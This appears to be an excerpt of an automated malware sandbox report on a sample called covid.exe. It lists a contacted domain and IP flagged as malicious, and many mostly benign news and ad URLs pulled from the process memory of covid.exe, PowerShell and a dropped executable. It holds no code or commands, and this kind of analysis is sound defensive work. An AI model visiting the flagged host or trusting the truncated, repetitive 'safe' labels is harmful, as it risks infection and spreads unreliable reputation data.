https://i2-prod.liverpool.com/incoming/article19940968.ece/ALTERNATES/s270b/0_Curtis-10.png0%URL Reputationsafe
https://www.liverpool.com/liverpool-fc-news/transfer-news/fsg-liverpool-gini-wijnaldum-transfer-18760%URL Reputationsafe
https://www.liverpool.com/liverpool-fc-news/transfer-news/fsg-liverpool-gini-wijnaldum-transfer-18760%URL Reputationsafe
https://www.liverpool.com/liverpool-fc-news/transfer-news/fsg-liverpool-gini-wijnaldum-transfer-18760%URL Reputationsafe
https://www.liverpool.com/liverpool-fc-news/transfer-news/fsg-liverpool-gini-wijnaldum-transfer-18760%URL Reputationsafe
http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
https://i2-prod.liverpool.com/incoming/article19946983.ece/ALTERNATES/s615/0_RobertsonCross1.jpg0%URL Reputationsafe
https://i2-prod.liverpool.com/incoming/article19946983.ece/ALTERNATES/s615/0_RobertsonCross1.jpg0%URL Reputationsafe
https://i2-prod.liverpool.com/incoming/article19946983.ece/ALTERNATES/s615/0_RobertsonCross1.jpg0%URL Reputationsafe
https://i2-prod.liverpool.com/incoming/article19946983.ece/ALTERNATES/s615/0_RobertsonCross1.jpg0%URL Reputationsafe
https://www.liverpool.com/liverpool-fc-news/features/jurgen-klopp-liverpool-transfer-targets-19961660%URL Reputationsafe
https://www.liverpool.com/liverpool-fc-news/features/jurgen-klopp-liverpool-transfer-targets-19961660%URL Reputationsafe
https://www.liverpool.com/liverpool-fc-news/features/jurgen-klopp-liverpool-transfer-targets-19961660%URL Reputationsafe
https://www.liverpool.com/liverpool-fc-news/features/jurgen-klopp-liverpool-transfer-targets-19961660%URL Reputationsafe
https://www.liverpool.com/liverpool-fc-news/transfer-news/liverpool-erling-haaland-transfer-weghorst0%URL Reputationsafe
https://www.liverpool.com/liverpool-fc-news/transfer-news/liverpool-erling-haaland-transfer-weghorst0%URL Reputationsafe
https://www.liverpool.com/liverpool-fc-news/transfer-news/liverpool-erling-haaland-transfer-weghorst0%URL Reputationsafe
https://www.liverpool.com/liverpool-fc-news/transfer-news/liverpool-erling-haaland-transfer-weghorst0%URL Reputationsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
mmwrlridbhmibnr.ml
172.67.220.147
truefalseunknown

Contacted URLs

NameMaliciousAntivirus DetectionReputation
http://mmwrlridbhmibnr.ml/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-A70E3BA9C56C3F44E5DAA4E51EAD00CB.htmltrue
  • 8%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
http://mmwrlridbhmibnr.ml/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-8D0E09CE9EC742EC93B6C666F9ACD863.htmlfalse
  • Avira URL Cloud: safe
unknown

URLs from Memory and Binaries

NameSourceMaliciousAntivirus DetectionReputation
https://i2-prod.liverpool.com/incoming/article19955855.ece/ALTERNATES/s458/0_GettyImages-1304940818.covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpfalse
  • URL Reputation: safe
  • URL Reputation: safe
  • URL Reputation: safe
  • URL Reputation: safe
unknown
https://i2-prod.liverpool.com/incoming/article19957561.ece/ALTERNATES/s458/1_FreeAgentPlayers.jpgcovid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpfalse
  • URL Reputation: safe
  • URL Reputation: safe
  • URL Reputation: safe
  • URL Reputation: safe
unknown
https://c.amazon-adsystem.com/aax2/apstag.jscovid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpfalse
    		high
    https://www.liverpool.com/liverpool-fc-news/features/liverpool-arsenal-klopp-lijnders-carabao-171668covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpfalse
    • URL Reputation: safe
    • URL Reputation: safe
    • URL Reputation: safe
    • URL Reputation: safe
    		unknown
    https://i2-prod.liverpool.com/incoming/article19936064.ece/ALTERNATES/s615/0_WhatsApp-Image-2021-02-covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpfalse
    • URL Reputation: safe
    • URL Reputation: safe
    • URL Reputation: safe
    • URL Reputation: safe
    		unknown
    https://i2-prod.liverpoolecho.co.uk/incoming/article17165318.ece/ALTERNATES/s615/2_GettyImages-11837covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpfalse
    • URL Reputation: safe
    • URL Reputation: safe
    • URL Reputation: safe
    • URL Reputation: safe
    		unknown
    https://i2-prod.liverpool.com/incoming/article19961704.ece/ALTERNATES/s220b/0_GettyImages-1273716690covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpfalse
    • URL Reputation: safe
    • URL Reputation: safe
    • URL Reputation: safe
    • URL Reputation: safe
    		unknown
    https://i2-prod.liverpool.com/incoming/article19961953.ece/ALTERNATES/s180/0_GettyImages-1302496803.covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpfalse
    • URL Reputation: safe
    • URL Reputation: safe
    • URL Reputation: safe
    • URL Reputation: safe
    		unknown
    https://i2-prod.liverpool.com/incoming/article19945821.ece/ALTERNATES/s270b/0_Salah-Goal-vs-Leeds.jpcovid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpfalse
    • URL Reputation: safe
    • URL Reputation: safe
    • URL Reputation: safe
    • URL Reputation: safe
    		unknown
    https://i2-prod.liverpool.com/incoming/article19960478.ece/ALTERNATES/s615/0_WhatsApp-Image-2021-03-covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpfalse
    • URL Reputation: safe
    • URL Reputation: safe
    • URL Reputation: safe
    • URL Reputation: safe
    		unknown
    https://www.liverpool.com/all-about/premier-leaguecovid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpfalse
    • URL Reputation: safe
    • URL Reputation: safe
    • URL Reputation: safe
    • URL Reputation: safe
    		unknown
    https://i2-prod.liverpool.com/incoming/article19938370.ece/ALTERNATES/s180/0_Salah-Pressing.jpgcovid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpfalse
    • URL Reputation: safe
    • URL Reputation: safe
    • URL Reputation: safe
    • URL Reputation: safe
    		unknown
    https://i2-prod.liverpool.com/incoming/article19940968.ece/ALTERNATES/s615/0_Curtis-10.pngcovid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpfalse
    • URL Reputation: safe
    • URL Reputation: safe
    • URL Reputation: safe
    • URL Reputation: safe
    		unknown
    https://i2-prod.liverpool.com/incoming/article19963923.ece/ALTERNATES/s180/1_WhatsApp-Image-2021-03-covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpfalse
    • URL Reputation: safe
    • URL Reputation: safe
    • URL Reputation: safe
    • URL Reputation: safe
    		unknown
    https://www.liverpool.com/liverpool-fc-news/covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpfalse
    • URL Reputation: safe
    • URL Reputation: safe
    • URL Reputation: safe
    • URL Reputation: safe
    		unknown
    https://www.liverpool.com/schedule/liverpool-arsenal-carabao-cup-klopp-17166154covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpfalse
    • URL Reputation: safe
    • URL Reputation: safe
    • URL Reputation: safe
    • URL Reputation: safe
    		unknown
    https://i2-prod.liverpool.com/incoming/article19955390.ece/ALTERNATES/s615/0_GettyImages-1231353837.covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpfalse
    • URL Reputation: safe
    • URL Reputation: safe
    • URL Reputation: safe
    • URL Reputation: safe
    		unknown
    https://www.liverpool.com/liverpool-fc-news/features/liverpool-psg-transfer-news-19957850covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpfalse
    • URL Reputation: safe
    • URL Reputation: safe
    • URL Reputation: safe
    • URL Reputation: safe
    		unknown
    https://i2-prod.liverpool.com/incoming/article19936064.ece/ALTERNATES/s220b/0_WhatsApp-Image-2021-02covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpfalse
    • URL Reputation: safe
    • URL Reputation: safe
    • URL Reputation: safe
    • URL Reputation: safe
    		unknown
    http://www.nirsoft.net/AdvancedRun.exe, AdvancedRun.exe, 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp, 41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe, 00000013.00000002.323823436.000000000040C000.00000002.00020000.sdmp, 41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe, 00000015.00000002.322563501.000000000040C000.00000002.00020000.sdmp, 41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe.0.drfalse
      		high
      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 0000000F.00000002.434270179.00000000049C1000.00000004.00000001.sdmpfalse
        		high
        https://i2-prod.liverpool.com/incoming/article19946983.ece/ALTERNATES/s180/0_RobertsonCross1.jpgcovid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpfalse
        • URL Reputation: safe
        • URL Reputation: safe
        • URL Reputation: safe
        • URL Reputation: safe
        		unknown
        https://ads.pubmatic.com/AdServer/js/pwt/156997/3236/pwt.jscovid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpfalse
          		high
          https://i2-prod.liverpool.com/incoming/article19940968.ece/ALTERNATES/s270b/0_Curtis-10.pngcovid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpfalse
          • URL Reputation: safe
          • URL Reputation: safe
          • URL Reputation: safe
          • URL Reputation: safe
          		unknown
          https://www.liverpool.com/liverpool-fc-news/transfer-news/fsg-liverpool-gini-wijnaldum-transfer-1876covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpfalse
          • URL Reputation: safe
          • URL Reputation: safe
          • URL Reputation: safe
          • URL Reputation: safe
          		unknown
          http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000010.00000003.387988534.0000000007851000.00000004.00000001.sdmpfalse
          • URL Reputation: safe
          • URL Reputation: safe
          • URL Reputation: safe
          • URL Reputation: safe
          		unknown
          http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000010.00000003.387988534.0000000007851000.00000004.00000001.sdmpfalse
            		high
            https://i2-prod.liverpool.com/incoming/article19946983.ece/ALTERNATES/s615/0_RobertsonCross1.jpgcovid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpfalse
            • URL Reputation: safe
            • URL Reputation: safe
            • URL Reputation: safe
            • URL Reputation: safe
            		unknown
            https://www.liverpool.com/liverpool-fc-news/features/jurgen-klopp-liverpool-transfer-targets-1996166covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpfalse
            • URL Reputation: safe
            • URL Reputation: safe
            • URL Reputation: safe
            • URL Reputation: safe
            		unknown
            https://www.liverpool.com/liverpool-fc-news/transfer-news/liverpool-erling-haaland-transfer-weghorstcovid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpfalse
            • URL Reputation: safe
            • URL Reputation: safe
            • URL Reputation: safe
            • URL Reputation: safe
            		unknown
            https://reachplc.hub.loginradius.com&quot;covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpfalse
            • Avira URL Cloud: safe
            		low
            https://i2-prod.liverpool.com/incoming/article19940968.ece/ALTERNATES/s220b/0_Curtis-10.pngcovid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpfalse
            • URL Reputation: safe
            • URL Reputation: safe
            • URL Reputation: safe
            • URL Reputation: safe
            		unknown
            https://i2-prod.liverpool.com/incoming/article19960206.ece/ALTERNATES/s180/0_WhatsApp-Image-2021-03-covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpfalse
            • URL Reputation: safe
            • URL Reputation: safe
            • URL Reputation: safe
            • URL Reputation: safe
            		unknown
            http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe.0.drfalse
            • URL Reputation: safe
            • URL Reputation: safe
            • URL Reputation: safe
            • URL Reputation: safe
            		unknown
            https://i2-prod.liverpool.com/incoming/article19955855.ece/ALTERNATES/s615/0_GettyImages-1304940818.covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpfalse
            • URL Reputation: safe
            • URL Reputation: safe
            • URL Reputation: safe
            • URL Reputation: safe
            		unknown
            https://i2-prod.liverpool.com/incoming/article19961704.ece/ALTERNATES/s270b/0_GettyImages-1273716690covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpfalse
            • URL Reputation: safe
            • URL Reputation: safe
            • URL Reputation: safe
            • URL Reputation: safe
            		unknown
            https://s2-prod.liverpool.comcovid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpfalse
            • URL Reputation: safe
            • URL Reputation: safe
            • URL Reputation: safe
            • URL Reputation: safe
            		unknown
            https://www.liverpool.com/liverpool-fc-news/features/mohamed-salah-liverpool-goal-flaw-19945816covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpfalse
            • URL Reputation: safe
            • URL Reputation: safe
            • URL Reputation: safe
            • URL Reputation: safe
            		unknown
            https://i2-prod.liverpool.com/incoming/article19955390.ece/ALTERNATES/s270b/0_GettyImages-1231353837covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpfalse
            • URL Reputation: safe
            • URL Reputation: safe
            • URL Reputation: safe
            • URL Reputation: safe
            		unknown
            https://github.com/Pester/Pesterpowershell.exe, 00000010.00000003.387988534.0000000007851000.00000004.00000001.sdmpfalse
              		high
              https://i2-prod.liverpool.comcovid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpfalse
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              		unknown
              https://felix.data.tm-awx.com/felix.min.jscovid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpfalse
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              		unknown
              https://i2-prod.liverpool.com/incoming/article19945821.ece/ALTERNATES/s180/0_Salah-Goal-vs-Leeds.jpgcovid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpfalse
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              		unknown
              https://i2-prod.liverpool.com/incoming/article19960478.ece/ALTERNATES/s180/0_WhatsApp-Image-2021-03-covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpfalse
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              		unknown
              https://i2-prod.liverpool.com/incoming/article19946983.ece/ALTERNATES/s270b/0_RobertsonCross1.jpgcovid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpfalse
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              		unknown
              https://i2-prod.liverpool.com/incoming/article19961704.ece/ALTERNATES/s458/0_GettyImages-1273716690.covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpfalse
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              		unknown
              https://www.liverpool.com/all-about/ozan-kabakcovid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpfalse
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              		unknown
              https://s2-prod.mirror.co.uk/covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpfalse
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              		unknown
              https://i2-prod.liverpool.com/incoming/article19936064.ece/ALTERNATES/s180/0_WhatsApp-Image-2021-02-covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpfalse
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              		unknown
              https://www.liverpool.com/all-about/champions-leaguecovid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpfalse
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              		unknown
              https://www.liverpool.com/all-about/curtis-jonescovid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpfalse
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              		unknown
              https://i2-prod.liverpool.com/incoming/article19960206.ece/ALTERNATES/s615/0_WhatsApp-Image-2021-03-covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpfalse
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              		unknown
              https://www.liverpool.com/all-about/steven-gerrardcovid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpfalse
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              		unknown
              https://www.liverpool.com/liverpool-fc-news/features/liverpool-ozan-kabak-future-audition-19954616covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpfalse
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              		unknown
              https://i2-prod.liverpool.com/incoming/article19963923.ece/ALTERNATES/s458/1_WhatsApp-Image-2021-03-covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpfalse
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              		unknown
              https://www.liverpool.com/liverpool-fc-news/features/liverpool-penalties-premier-league-var-17171391covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpfalse
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              		unknown
              http://schema.org/NewsArticlecovid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpfalse
                		high
                https://www.liverpool.com/schedule/covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpfalse
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                		unknown
                http://schema.org/BreadcrumbListcovid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpfalse
                  		high
                  https://securepubads.g.doubleclick.net/tag/js/gpt.jscovid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpfalse
                    		high
                    http://ocsp.sectigo.com041c37f5f-e2a1-423e-b793-6cf7f8d71535.exe.0.drfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    		unknown
                    https://s2-prod.liverpool.com/covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    		unknown
                    https://www.liverpool.com/liverpool-fc-news/features/liverpool-champions-league-jurgen-klopp-1996194covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    		unknown
                    https://i2-prod.liverpool.com/incoming/article19955390.ece/ALTERNATES/s220b/0_GettyImages-1231353837covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    		unknown
                    https://i2-prod.liverpool.com/incoming/article19961953.ece/ALTERNATES/s458/0_GettyImages-1302496803.covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    		unknown
                    https://felix.data.tm-awx.com/ampconfig.json&quot;covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    		unknown
                    https://i2-prod.liverpool.com/incoming/article19961704.ece/ALTERNATES/s615/0_GettyImages-1273716690.covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    		unknown
                    http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe.0.drfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    		unknown
                    https://i2-prod.liverpool.com/incoming/article19938370.ece/ALTERNATES/s270b/0_Salah-Pressing.jpgcovid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    		unknown
                    https://i2-prod.liverpool.com/incoming/article19945821.ece/ALTERNATES/s615/0_Salah-Goal-vs-Leeds.jpgcovid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    		unknown
                    https://i2-prod.liverpool.com/incoming/article19936064.ece/ALTERNATES/s270b/0_WhatsApp-Image-2021-02covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    		unknown
                    https://i2-prod.liverpool.com/incoming/article19946983.ece/ALTERNATES/s220b/0_RobertsonCross1.jpgcovid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    		unknown
                    https://www.liverpool.com/liverpool-fc-news/features/liverpool-andy-robertson-valuable-quality-19946covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    		unknown
                    https://www.liverpool.com/liverpool-fc-news/features/liverpool-jurgen-klopp-pressing-tactics-1993836covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    		unknown
                    https://i2-prod.liverpool.com/incoming/article19938370.ece/ALTERNATES/s615/0_Salah-Pressing.jpgcovid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    		unknown
                    http://schema.org/ListItemcovid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpfalse
                      		high
                      https://www.liverpool.com/all-about/georginio-wijnaldumcovid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      		unknown
                      https://mab.data.tm-awx.com/rhs&quot;covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      		unknown
                      https://i2-prod.liverpool.com/incoming/article19955390.ece/ALTERNATES/s180/0_GettyImages-1231353837.covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      		unknown
                      https://felix.data.tm-awx.comcovid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      		unknown
                      https://www.liverpool.com/all-about/andrew-robertsoncovid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      		unknown
                      https://sectigo.com/CPS0C41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe.0.drfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      		unknown
                      https://i2-prod.liverpool.com/incoming/article17166876.ece/ALTERNATES/s615/0_GettyImages-1175998874.covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      		unknown
                      https://sectigo.com/CPS0D41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe.0.drfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      		unknown
                      https://www.liverpool.com/liverpool-fc-news/features/liverpool-gini-wijnaldum-rumours-fitness-199533covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      		unknown
                      https://www.liverpool.com/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish-199590covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      		unknown
                      https://i2-prod.liverpool.com/incoming/article19955855.ece/ALTERNATES/s180/0_GettyImages-1304940818.covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      		unknown
                      https://www.liverpool.com/covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      		unknown
                      https://www.liverpool.com/all-about/transferscovid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      		unknown
                      https://www.liverpool.com/liverpool-fc-news/features/rhian-brewster-liverpool-arsenal-team-17172763&covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      		unknown
                      https://i2-prod.liverpool.com/incoming/article19957561.ece/ALTERNATES/s615/1_FreeAgentPlayers.jpgcovid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      		unknown
                      https://i2-prod.liverpool.com/incoming/article19957561.ece/ALTERNATES/s180/1_FreeAgentPlayers.jpgcovid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      		unknown
